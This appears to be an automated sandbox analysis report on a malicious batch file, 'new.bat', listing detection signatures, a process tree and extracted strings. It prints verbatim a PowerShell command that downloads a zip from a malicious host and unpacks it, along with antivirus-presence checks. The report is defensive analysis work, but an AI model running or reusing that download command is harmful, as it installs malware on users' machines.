Edit tour

Windows Analysis Report
new.bat

Overview

General Information

Sample name:	new.bat
Analysis ID:	1554412
MD5:	7b66e627772c9938b6aa1295f677440e
SHA1:	f205c9ef9b3c1792b10970ba1b49ffdbba35ef9d
SHA256:	37ff3fde213752b29ba69ac327b27de8f4e93d6de8534e0cb0f781c1a493c2ab
Tags:	batuser-VaudCERT
Infos:

Detection

Score:	72
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Malicious sample detected (through community Yara rule)

AI detected suspicious sample

Infects executable files (exe, dll, sys, html)

Loading BitLocker PowerShell Module

Suspicious powershell command line found

AV process strings found (often used to terminate AV products)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

May sleep (evasive loops) to hinder dynamic analysis

Queries disk information (often used to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sigma detected: Potential Binary Or Script Dropper Via PowerShell

Sigma detected: PowerShell Web Download

Sigma detected: Usage Of Web Request Commands And Cmdlets

Yara signature match

Classification

Process Tree

System is w10x64

cmd.exe (PID: 3624 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\new.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 4408 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

Acrobat.exe (PID: 5076 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Downloads\BPMLNOBVSB.pdf" MD5: 24EAD1C46A47022347DC0F05F6EFBB8C)

AcroCEF.exe (PID: 7268 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)

AcroCEF.exe (PID: 7576 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=1544 --field-trial-handle=1512,i,14252116939018401224,568622444743397094,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)

timeout.exe (PID: 5592 cmdline: timeout /t 5 REM Wait for PDF to open (adjust timeout as needed) MD5: 100065E21CFBBDE57CBA2838921F84D6)

tasklist.exe (PID: 5596 cmdline: tasklist /FI "IMAGENAME eq AvastUI.exe" MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)

find.exe (PID: 3756 cmdline: find /i "AvastUI.exe" MD5: 4BF76A28D31FC73AA9FC970B22D056AF)

tasklist.exe (PID: 1780 cmdline: tasklist /FI "IMAGENAME eq avgui.exe" MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)

find.exe (PID: 5640 cmdline: find /i "avgui.exe" MD5: 4BF76A28D31FC73AA9FC970B22D056AF)

powershell.exe (PID: 3756 cmdline: powershell -Command "try { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://invoiceposs.shop:9005/bab.zip' -OutFile 'C:\Users\user\Downloads\downloaded.zip' } catch { exit 1 }" MD5: 04029E121A0CFA5991749937DD22A1D9)

powershell.exe (PID: 4336 cmdline: powershell -Command "try { Expand-Archive -Path 'C:\Users\user\Downloads\downloaded.zip' -DestinationPath 'C:\Users\user\Downloads\Extracted' -Force } catch { exit 1 }" MD5: 04029E121A0CFA5991749937DD22A1D9)

svchost.exe (PID: 7376 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

cleanup

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
new.bat	MALWARE_BAT_KoadicBAT	Koadic post-exploitation framework BAT payload	ditekSHen	0x2:$s1: &@cls&@set 0x5d:$s2: :~53,1%% 0x6a:$s2: :~34,1%% 0x77:$s2: :~55,1%% 0x84:$s2: :~33,1%% 0x91:$s2: :~2,1%% 0x9d:$s2: :~15,1%% 0xaa:$s2: :~2,1%% 0xb6:$s2: :~38,1%% 0xc3:$s2: :~38,1%% 0xdb:$s2: :~25,1%% 0xe8:$s2: :~34,1%% 0xf5:$s2: :~3,1%% 0x101:$s2: :~16,1%% 0x10e:$s2: :~2,1%% 0x123:$s2: :~55,1%% 0x130:$s2: :~21,1%% 0x13d:$s2: :~16,1% 0x150:$s2: :~15,1%% 0x15d:$s2: :~22,1%% 0x16a:$s2: :~43,1%%

Sigma Signatures

System Summary

Sigma detected: Potential Binary Or Script Dropper Via PowerShell

Source: File created

Author: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 4336, TargetFilename: C:\Users\user\Downloads\Extracted\Python\Launcher\py.exe

Sigma detected: PowerShell Web Download

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: powershell -Command "try { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://invoiceposs.shop:9005/bab.zip' -OutFile 'C:\Users\user\Downloads\downloaded.zip' } catch { exit 1 }", CommandLine: powershell -Command "try { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://invoiceposs.shop:9005/bab.zip' -OutFile 'C:\Users\user\Downloads\downloaded.zip' } catch { exit 1 }", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\new.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 3624, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -Command "try { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://invoiceposs.shop:9005/bab.zip' -OutFile 'C:\Users\user\Downloads\downloaded.zip' } catch { exit 1 }", ProcessId: 3756, ProcessName: powershell.exe

Sigma detected: Usage Of Web Request Commands And Cmdlets

Source: Process started

Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: powershell -Command "try { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://invoiceposs.shop:9005/bab.zip' -OutFile 'C:\Users\user\Downloads\downloaded.zip' } catch { exit 1 }", CommandLine: powershell -Command "try { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://invoiceposs.shop:9005/bab.zip' -OutFile 'C:\Users\user\Downloads\downloaded.zip' } catch { exit 1 }", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\new.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 3624, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -Command "try { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://invoiceposs.shop:9005/bab.zip' -OutFile 'C:\Users\user\Downloads\downloaded.zip' } catch { exit 1 }", ProcessId: 3756, ProcessName: powershell.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -Command "try { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://invoiceposs.shop:9005/bab.zip' -OutFile 'C:\Users\user\Downloads\downloaded.zip' } catch { exit 1 }", CommandLine: powershell -Command "try { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://invoiceposs.shop:9005/bab.zip' -OutFile 'C:\Users\user\Downloads\downloaded.zip' } catch { exit 1 }", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\new.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 3624, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -Command "try { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://invoiceposs.shop:9005/bab.zip' -OutFile 'C:\Users\user\Downloads\downloaded.zip' } catch { exit 1 }", ProcessId: 3756, ProcessName: powershell.exe

Sigma detected: Windows Processes Suspicious Parent Directory

Source: Process started

Author: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 620, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 7376, ProcessName: svchost.exe

Suricata Signatures

⊘No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: http://invoiceposs.shop:9005/FTSP.zip

Avira URL Cloud: Label: malware

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 94.4% probability

Source:	Binary string: <li><a href="library/pdb.html#pdb.Pdb.set_trace">(pdb.Pdb method)</a> source: genindex-S.html.17.dr
Source:	Binary string: .pdbrc source: genindex-Symbols.html.17.dr
Source:	Binary string: <li><p>The <a class="reference internal" href="../library/pdb.html#module-pdb" title="pdb: The Python debugger for interactive interpreters."><code class="xref py py-mod docutils literal notranslate"><span class="pre">pdb</span></code></a> module now reads the <code class="file docutils literal notranslate"><span class="pre">.pdbrc</span></code> configuration file with source: 3.11.html.17.dr

Spreading

Infects executable files (exe, dll, sys, html)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

System file written: C:\Users\user\Downloads\Extracted\Python\Python312\Doc\html\c-api\tuple.html

Jump to behavior

Source: 2.5.html.17.dr

String found in binary or memory: with closing(urllib.urlopen('http://www.yahoo.com')) as f: equals www.yahoo.com (Yahoo)

Source: codecs.py.17.dr	String found in binary or memory: http://bugs.python.org/issue19619
Source: filesystem.py.17.dr	String found in binary or memory: http://bugs.python.org/issue22107
Source: filesystem.py.17.dr	String found in binary or memory: http://bugs.python.org/issue2528
Source: svchost.exe, 0000000A.00000002.3029148950.000001EF13200000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.ver)
Source: transports.py.17.dr	String found in binary or memory: http://docs.python.org/3/library/subprocess#subprocess.Popen.kill
Source: transports.py.17.dr	String found in binary or memory: http://docs.python.org/3/library/subprocess#subprocess.Popen.returncode
Source: transports.py.17.dr	String found in binary or memory: http://docs.python.org/3/library/subprocess#subprocess.Popen.terminate
Source: svchost.exe, 0000000A.00000003.1822470393.000001EF12F78000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
Source: svchost.exe, 0000000A.00000003.1822470393.000001EF12F78000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome/acosgr5ufcefr7w7nv4v6k4ebdda_117.0.5938.132/117.0.5
Source: svchost.exe, 0000000A.00000003.1822470393.000001EF12F78000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
Source: svchost.exe, 0000000A.00000003.1822470393.000001EF12F78000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
Source: svchost.exe, 0000000A.00000003.1822470393.000001EF12F78000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
Source: svchost.exe, 0000000A.00000003.1822470393.000001EF12F78000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
Source: svchost.exe, 0000000A.00000003.1822470393.000001EF12FAD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
Source: xml.etree.elementtree.html.17.dr	String found in binary or memory: http://example.org/"
Source: svchost.exe, 0000000A.00000003.1822470393.000001EF13067000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
Source: powershell.exe, 00000008.00000002.2388491689.0000025731818000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://invoiceposs.shop:9005
Source: powershell.exe, 00000008.00000002.2387867292.000002572F7E9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://invoiceposs.shop:9005/FTSP.zip
Source: powershell.exe, 00000008.00000002.2388213776.000002572FAA4000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2435985047.0000025749990000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://invoiceposs.shop:9005/FTSP.zipHOMEDRIVE=C:HOMEPATH=
Source: powershell.exe, 00000008.00000002.2387867292.000002572F7E9000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2435985047.0000025749A05000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://invoiceposs.shop:9005/bab.zip
Source: powershell.exe, 00000008.00000002.2387867292.000002572F7E9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://invoiceposs.shop:9005/bab.zip.
Source: powershell.exe, 00000008.00000002.2387867292.000002572F7E9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://invoiceposs.shop:9005/bab.zip?
Source: powershell.exe, 00000008.00000002.2387867292.000002572F7E9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://invoiceposs.shop:9005/bab.zipO#
Source: powershell.exe, 00000008.00000002.2431123146.00000257417A6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2431123146.0000025741663000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000008.00000002.2388491689.0000025731818000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: req_file.cpython-312.pyc.17.dr	String found in binary or memory: http://pubs.opengroup.org/onlinepubs/9699919799/
Source: powershell.exe, 00000008.00000002.2388491689.00000257315F1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: README.ctypes.17.dr, fetch_macholib.bat.17.dr	String found in binary or memory: http://svn.red-bean.com/bob/macholib/trunk/macholib/
Source: powershell.exe, 00000008.00000002.2388491689.0000025731818000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: unittest.mock-examples.html.17.dr	String found in binary or memory: http://www.dabeaz.com/coroutines/index.html
Source: unittest.mock-examples.html.17.dr	String found in binary or memory: http://www.dabeaz.com/generators/
Source: floatingpoint.html.17.dr	String found in binary or memory: http://www.indowsway.com/floatingpoint.htm
Source: xml.sax.handler.html.17.dr	String found in binary or memory: http://xml.org/sax/features/external-general-entities"
Source: xml.sax.handler.html.17.dr	String found in binary or memory: http://xml.org/sax/features/external-parameter-entities"
Source: xml.sax.handler.html.17.dr	String found in binary or memory: http://xml.org/sax/features/namespace-prefixes"
Source: xml.sax.handler.html.17.dr	String found in binary or memory: http://xml.org/sax/features/namespaces"
Source: xml.sax.handler.html.17.dr	String found in binary or memory: http://xml.org/sax/features/string-interning"
Source: xml.sax.handler.html.17.dr	String found in binary or memory: http://xml.org/sax/features/validation"
Source: xml.sax.handler.html.17.dr	String found in binary or memory: http://xml.org/sax/properties/declaration-handler"
Source: xml.sax.handler.html.17.dr	String found in binary or memory: http://xml.org/sax/properties/dom-node"
Source: xml.sax.handler.html.17.dr	String found in binary or memory: http://xml.org/sax/properties/lexical-handler
Source: xml.sax.handler.html.17.dr	String found in binary or memory: http://xml.org/sax/properties/lexical-handler"
Source: xml.sax.handler.html.17.dr	String found in binary or memory: http://xml.org/sax/properties/xml-string"
Source: base64.py.17.dr	String found in binary or memory: http://zgp.org/pipermail/p2p-hackers/2001-September/000316.html
Source: powershell.exe, 00000008.00000002.2388491689.00000257315F1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore68
Source: 3.8.html.17.dr	String found in binary or memory: https://ark.intel.com/content/www/us/en/ark/products/76088/intel-core-i7-4960hq-processor-6m-cache-u
Source: 3.8.html.17.dr	String found in binary or memory: https://blog.unicode.org/2019/05/unicode-12-1-en.html
Source: interactive.html.17.dr	String found in binary or memory: https://bpython-interpreter.org/
Source: pythread.h.17.dr	String found in binary or memory: https://bugs.python.org/issue31370
Source: typeobj.html.17.dr	String found in binary or memory: https://bugs.python.org/issue40217
Source: pystate.h.17.dr	String found in binary or memory: https://bugs.python.org/issue45953#msg412046.
Source: 3.8.html.17.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=1054041
Source: 3.8.html.17.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=10544
Source: 3.8.html.17.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=1230540
Source: 3.8.html.17.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=13153
Source: 3.8.html.17.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=13611
Source: 3.8.html.17.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=15248
Source: 3.8.html.17.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=1529353
Source: 3.1.html.17.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=1580
Source: 3.1.html.17.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=1655
Source: 3.1.html.17.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=1664
Source: 3.1.html.17.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=1696199
Source: 3.8.html.17.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=17239
Source: 3.1.html.17.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=1739468
Source: 3.8.html.17.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=17535
Source: 3.8.html.17.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=17561
Source: 3.8.html.17.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=17611
Source: 3.1.html.17.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=1818
Source: 3.8.html.17.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=18748
Source: 3.8.html.17.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=20092
Source: 3.8.html.17.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=20849
Source: 3.8.html.17.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=21145
Source: 3.8.html.17.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=2122
Source: 3.8.html.17.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=21536
Source: 3.8.html.17.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=22640
Source: 3.8.html.17.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=23057
Source: 3.8.html.17.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=23722
Source: 3.8.html.17.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=23831
Source: 3.8.html.17.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=23867
Source: 3.8.html.17.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=24412
Source: 3.8.html.17.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=2504
Source: 3.8.html.17.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=25427
Source: 3.8.html.17.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=25451
Source: 3.8.html.17.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=26219
Source: 3.8.html.17.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=26467
Source: 3.8.html.17.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=26707
Source: 3.8.html.17.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=26836
Source: 3.8.html.17.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=26978
Source: 3.8.html.17.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=27181
Source: 3.8.html.17.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=28238
Source: 3.8.html.17.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=29209
Source: 3.8.html.17.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=29235
Source: 3.1.html.17.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=2983
Source: 3.8.html.17.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=29883
Source: 3.8.html.17.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=30262
Source: 3.8.html.17.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=30661
Source: 3.8.html.17.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=30670
Source: 3.8.html.17.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=30688
Source: 3.8.html.17.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=30977
Source: 3.8.html.17.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=31508
Source: 3.8.html.17.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=31553
Source: 3.8.html.17.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=31680
Source: 3.8.html.17.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=32102
Source: 3.8.html.17.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=32117
Source: 3.8.html.17.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=32285
Source: 3.8.html.17.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=32314
Source: 3.8.html.17.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=32380
Source: 3.8.html.17.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=32388
Source: 3.8.html.17.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=32417
Source: 3.8.html.17.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=32430
Source: 3.8.html.17.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=32489
Source: 3.8.html.17.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=32492
Source: 3.8.html.17.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=32528
Source: 3.8.html.17.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=32718
Source: 3.8.html.17.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=32749
Source: 3.8.html.17.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=32751
Source: 3.8.html.17.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=32892
Source: 3.8.html.17.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=32941
Source: 3.8.html.17.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=32972
Source: 3.8.html.17.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=33041
Source: 3.8.html.17.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=33073
Source: 3.8.html.17.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=33083
Source: 3.8.html.17.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=33089
Source: 3.8.html.17.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=33106
Source: 3.8.html.17.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=33234
Source: 3.8.html.17.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=33407
Source: 3.8.html.17.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=33416
Source: 3.8.html.17.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=33462
Source: 3.8.html.17.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=33499
Source: 3.8.html.17.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=33530
Source: 3.8.html.17.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=33597
Source: 3.8.html.17.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=33671
Source: 3.8.html.17.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=33695
Source: 3.8.html.17.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=33710
Source: 3.8.html.17.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=33721
Source: 3.8.html.17.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=33725
Source: 3.8.html.17.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=33818
Source: 3.8.html.17.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=33897
Source: 3.8.html.17.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=33899
Source: 3.8.html.17.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=34003
Source: 3.8.html.17.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=34075
Source: 3.8.html.17.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=34160
Source: 3.8.html.17.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=34270
Source: 3.1.html.17.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=3439
Source: 3.8.html.17.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=34616
Source: 3.8.html.17.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=34632
Source: 3.8.html.17.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=34641
Source: 3.8.html.17.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=34651
Source: 3.8.html.17.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=34659
Source: 3.8.html.17.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=34670
Source: 3.8.html.17.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=34687
Source: 3.8.html.17.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=34790
Source: 3.8.html.17.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=34829
Source: 3.8.html.17.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=34850
Source: 3.8.html.17.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=34898
Source: 3.8.html.17.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=35047
Source: 3.8.html.17.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=35059
Source: 3.8.html.17.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=35081
